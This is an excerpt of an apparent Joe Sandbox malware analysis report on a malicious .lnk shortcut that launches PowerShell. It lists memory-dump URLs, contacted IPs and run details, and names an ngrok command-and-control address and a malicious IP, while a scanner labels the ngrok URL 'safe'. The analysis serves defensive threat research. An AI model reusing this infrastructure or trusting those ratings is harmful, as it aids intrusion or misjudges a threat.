                                                                                                                                                                https://docs.google.com/presentation/fsip/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://anglebug.com/5371msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://canny.io/sdk.jspowershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://permanently-removed.invalid/LogoutYxABmsedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://selfguidedlearning.dropboxbusiness.com/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://www.google.com/recaptcha/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://anglebug.com/7556msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://chromewebstore.google.com/msedge.exe, 00000005.00000002.2232649606.00003C100000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2412695864.00001C4C0018C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://www.microsoft.coXpowershell.exe, 00000010.00000002.2521531111.0000028B71FE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://docs.sandbox.google.com/presentation/fsip/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://dl-web.dropbox.com/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://app.hellofax.com/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://cfl.dropboxstatic.com/static/powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://uc48b83ada642288f62fac023367.dl.dropboxusercontent.compowershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://www.dropbox.com/csp_log?policy_name=metaserver-whitelistpowershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://www.dropbox.com/service_worker.jspowershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://anglebug.com/3584msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://anglebug.com/4551msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://anglebug.com/5881msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2228408499.00003C1000378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://anglebug.com/6692msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://paper.dropbox.com/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://www.hellofax.com/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://pal-test.adyen.compowershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://contoso.com/Licensepowershell.exe, 00000002.00000002.2366006267.000001BD94052000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://anglebug.com/3862msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.apppowershell.exe, 00000002.00000002.2324544978.000001BD84206000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    https://permanently-removed.invalid/o/oauth2/revokemsedge.exe, 00000005.00000003.2226848582.00003C1000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2226353819.00003C1000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2394454000.00001C4C00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2372120076.00001C4C00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://anglebug.com/4836msedge.exe, 00000005.00000003.2226898142.00003C100037C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.compowershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                        https://www.hellosign.com/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://instructorledlearning.dropboxbusiness.com/powershell.exe, 00000002.00000002.2324544978.000001BD84376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD843FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8438D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2324544978.000001BD8440B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2459373881.0000028B00B28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high

                                                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                                            Public IPs

                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                            162.125.65.15
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		19679DROPBOXUSfalse
                                                                                                                                                                                                                            162.125.65.18
                                                                                                                                                                                                                            		www-env.dropbox-dns.comUnited States
                                                                                                                                                                                                                            		19679DROPBOXUSfalse
                                                                                                                                                                                                                            172.217.19.225
                                                                                                                                                                                                                            		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                            		15169GOOGLEUSfalse
                                                                                                                                                                                                                            162.125.69.15
                                                                                                                                                                                                                            		edge-block-www-env.dropbox-dns.comUnited States
                                                                                                                                                                                                                            		19679DROPBOXUSfalse
                                                                                                                                                                                                                            162.159.61.3
                                                                                                                                                                                                                            		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            172.64.41.3
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            239.255.255.250
                                                                                                                                                                                                                            		unknownReserved
                                                                                                                                                                                                                            		unknownunknownfalse
                                                                                                                                                                                                                            3.125.209.94
                                                                                                                                                                                                                            		7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appUnited States
                                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                                            162.213.210.250
                                                                                                                                                                                                                            		unknownUnited States
                                                                                                                                                                                                                            		53755IOFLOODUStrue

                                                                                                                                                                                                                            Private

                                                                                                                                                                                                                            IP
                                                                                                                                                                                                                            192.168.2.7
                                                                                                                                                                                                                            192.168.2.4
                                                                                                                                                                                                                            192.168.2.5
                                                                                                                                                                                                                            127.0.0.1

                                                                                                                                                                                                                            General Information

                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                            Analysis ID:1572661
                                                                                                                                                                                                                            Start date and time:2024-12-10 18:39:09 +01:00
                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                            Overall analysis duration:0h 10m 48s
                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                            Number of analysed new started processes analysed:33
                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                            Sample name:qxjDerXRGR.lnk
                                                                                                                                                                                                                            renamed because original name is a hash value
                                                                                                                                                                                                                            Original Sample Name:72aecd00372e488060a53065258a0eb3b57cdd79db5b2afda0082ffe92ebc269.lnk
                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                            Classification:mal100.troj.evad.winLNK@82/287@21/13
                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                            • Successful, ratio: 33.3%
                                                                                                                                                                                                                            HCA Information:Failed
                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                            • Found application associated with file extension: .lnk

                                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95, 13.107.42.16, 204.79.197.239, 13.107.21.239, 172.217.19.238, 13.107.6.158, 104.110.240.201, 104.110.240.232, 2.16.158.33, 2.16.158.186, 2.16.158.192, 2.16.158.169, 2.16.158.40, 2.16.158.176, 2.16.158.184, 2.16.158.187, 2.16.158.27, 23.218.208.109, 13.87.96.169, 20.42.65.92, 199.232.210.172, 142.251.40.227, 142.251.40.99, 142.251.40.195, 52.149.20.212, 13.107.246.63, 94.245.104.56, 20.190.147.8, 23.44.133.41, 13.91.222.61, 13.107.246.40, 13.107.22.239, 172.183.192.109, 13.107.21.237
                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, msedge.b.tlu.dl.delivery.mp.microsoft.com, www.gstatic.com, l-0007.l-msedge.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, www.bing.com, cdp-f-tlu-net.trafficmanager.net, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, bzib.nelreports.net.akamaized.net, prod-agic-us-1.uksouth.cloudapp.azure.com, otelrules.azureedge.net, api.edgeoffer.microsoft.com, ctldl.windowsupdate.com, b-0005.b-msedge.net, p
                                                                                                                                                                                                                            • Execution Graph export aborted for target 111392827.exe, PID 9612 because there are no executed function
                                                                                                                                                                                                                            • Execution Graph export aborted for target fontdrvhost.exe, PID 9640 because there are no executed function
                                                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 5660 because it is empty
